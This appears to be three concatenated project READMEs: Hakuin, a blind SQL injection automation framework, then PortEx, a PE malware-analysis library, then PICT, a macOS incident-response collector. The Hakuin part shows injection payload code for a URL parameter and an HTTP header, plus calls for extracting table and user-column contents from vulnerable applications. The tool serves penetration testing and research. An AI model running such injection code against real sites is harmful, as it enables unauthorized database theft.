Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023
More information can be found in our paper and slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e
flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester
and override the request
method. Also, the method must determine whether the query resolved to True
or False
.
import aiohttp
from hakuin import Requester
class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()
To start extracting data, use the Extractor
class. It requires a DBMS
object to contruct queries and a Requester
object to inject them. Hakuin currently supports SQLite
, MySQL
, PSQL
(PostgreSQL), and MSSQL
(SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS
interface defined in hakuin/dbms/DBMS.py
.
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
Now that eveything is set, you can start extracting DB metadata.
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
metadata = await ext.extract_meta(strategy='model')
Once you know the structure, you can extract the actual content.
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
res = await ext.extract_column_int(table='users', column='id')
res = await ext.extract_column_float(table='products', column='price')
res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests
directory.
Hakuin comes with a simple wrapper tool, hk.py
, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.
For more information have a look at PortEx Wiki and the Documentation
PortexAnalyzer CLI is a command line tool that runs the library PortEx under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with it, download it from here PortexAnalyzer.jar
The GUI version is available here: PortexAnalyzerGUI
You can include PortEx to your project by adding the following Maven dependency:
<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
</dependency>
To use a local build, add the library as follows:
<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
<scope>system</scope>
<systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>
Add the dependency as follows in your build.sbt
libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"
PortEx is build with sbt
To simply compile the project invoke:
$ sbt compile
To create a jar:
$ sbt package
To compile a fat jar that can be used as command line tool, type:
$ sbt assembly
You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:
addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")
Generate the project files for Eclipse:
$ sbt eclipse
Import the project to Eclipse via the Import Wizard.
I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel
Karsten Hahn
Twitter: @Struppigel
Mastodon: struppigel@infosec.exchange
Youtube: MalwareAnalysisForHedgehogs
This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.
If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.
The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without.
Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser
module will output a browser_extensions.txt
file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.
The second are complete files collected from the filesystem. These are stored in an artifacts
subfolder inside the collection folder.
The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:
./pict.py -c /path/to/config.json
The configuration script describes what the script will collect, and how. It should look something like this:
This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared
.
Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD
, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.
If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.
PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.
The collectors
data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py
extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused
.
This dictionary provides global settings.
keepLSData
specifies whether the lsregister.txt
file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)
zipIt
specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.
This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts
being used with the browser
module.
There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.
collectArtifacts
specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.
Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py
), and they must be placed in the collectors
folder. A new Collector module can be easily created by duplicating the collectors/template.py
file and customizing it for your own use.
def __init__(self, collectionPath, allUsers)
This method can be overridden if necessary, but the super Collector.init() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.
def printStartInfo(self)
This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.
def applySettings(self, settingsDict)
This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.
def collect(self)
This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath
, and should use filenames that are not already taken by other modules.
If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect
array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts
folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.
When the method finishes, be sure to call the super (Collector.collect(self)
) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.
Your collect
method can use any data collected in the basic_info.txt
or lsregister.txt
files found at self.collectionPath
. These are collected at the beginning by the pict.py
script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.